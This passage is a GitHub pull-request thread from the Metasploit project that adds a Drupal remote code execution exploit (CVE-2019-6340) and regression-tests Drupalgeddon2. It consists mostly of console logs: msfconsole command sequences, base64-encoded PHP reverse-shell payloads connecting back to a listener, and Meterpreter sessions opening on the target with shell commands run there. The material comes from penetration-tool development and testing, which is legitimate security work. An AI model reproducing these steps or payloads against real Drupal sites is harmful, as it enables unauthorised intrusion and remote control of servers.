if you have an abundance and dry it. Picked basil stays fresh longer if it is placed in water (like fresh flowers). A great way to store basil is to make it into pesto!\u003C\/p\u003E\n\u003Ch3\u003EChives\u003C\/h3\u003E\n\u003Cp\u003EA versatile herb, chives can grow well indoors. Ensure the plant is watered well, and gets plenty of light. Remember to regularly trim the chives. This prevents the flowers from developing and encourages new growth.\u003C\/p\u003E\n\u003Ch3\u003ECoriander (Cilantro)\u003C\/h3\u003E\n\u003Cp\u003ECoriander can grow indoors, but unlike the other herbs, it doesn\u0027t like full sun. If you have a south facing kitchen window, this isn\u0027t the place for it. Although not as thirsty as basil, coriander doesn\u0027t like dry soil so don\u0027t forget to water it! Cut coriander is best stored in the fridge.\u003C\/p\u003E\n","summary":null,"lang":"en"}]}uid=33(www-data) gid=33(www-data) groups=33(www-data)

[!] If you did not get code execution, try a new node ID
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set target PHP In-Memory
target => PHP In-Memory
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
[*] Sending GET to /node/1 with link http://127.0.0.1/rest/type/shortcut/default
[!] If you did not get code execution, try a new node ID
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set node 2
node => 2
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
[*] Sending GET to /node/2 with link http://127.0.0.1/rest/type/shortcut/default
[*] Sending stage (38247 bytes) to 192.168.1.2
[*] Meterpreter session 3 opened (192.168.1.2:4444 -> 192.168.1.2:56176) at 2019-03-05 20:27:16 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : 11f5c33da9ec
OS          : Linux 11f5c33da9ec 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Also lol: {"message":"No authentication credentials provided."}uid=33(www-data) gid=33(www-data) groups=33(www-data).

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Mar 6, 2019

drupal_drupalgeddon2 tested for regressions

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       127.0.0.1        yes       The target address range or CIDR identifier
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[*] Drupal 7 targeted at http://127.0.0.1/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): 5eYr1O58NTnt4XzvmyKhL14
[+] Drupal is vulnerable to code execution
[+] 127.0.0.1:80 - The target is vulnerable.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Drupal 7 targeted at http://127.0.0.1/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): DUMtLcijPmyU
[+] Drupal is vulnerable to code execution
[*] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
[*] Sending stage (38247 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:56366) at 2019-03-05 20:42:59 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : cf0aace3c2b0
OS          : Linux cf0aace3c2b0 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
Background session 1? [y/N]
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set target 2
target => 2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set cmd id
cmd => id
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Drupal 7 targeted at http://127.0.0.1/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): hihOCEa3C9u1WoBxnSevXgL
[+] Drupal is vulnerable to code execution
[!] Enabling DUMP_OUTPUT for cmd/unix/generic
[*] Executing with passthru(): /bin/echo -ne \\\x69\\\x64|sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[{"command":"settings","settings":{"basePath":"\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"dJtFLXrHAdKsf216MLFtCkCHPrs1whdcmX4DEczkmPM"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"","settings":{"basePath":"\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"dJtFLXrHAdKsf216MLFtCkCHPrs1whdcmX4DEczkmPM"}}}]
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) >

@wvu-r7 wvu-r7 merged commit 0de69e7 into rapid7:master Mar 6, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request Mar 6, 2019

msjenkins-r7 added a commit that referenced this pull request Mar 6, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Mar 6, 2019

Release Notes

This adds a remote code execution exploit for Drupal SA-CORE-2019-003 (CVE-2019-6340) with various enhancements to Drupalgeddon 2 and the Drupal mixin.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.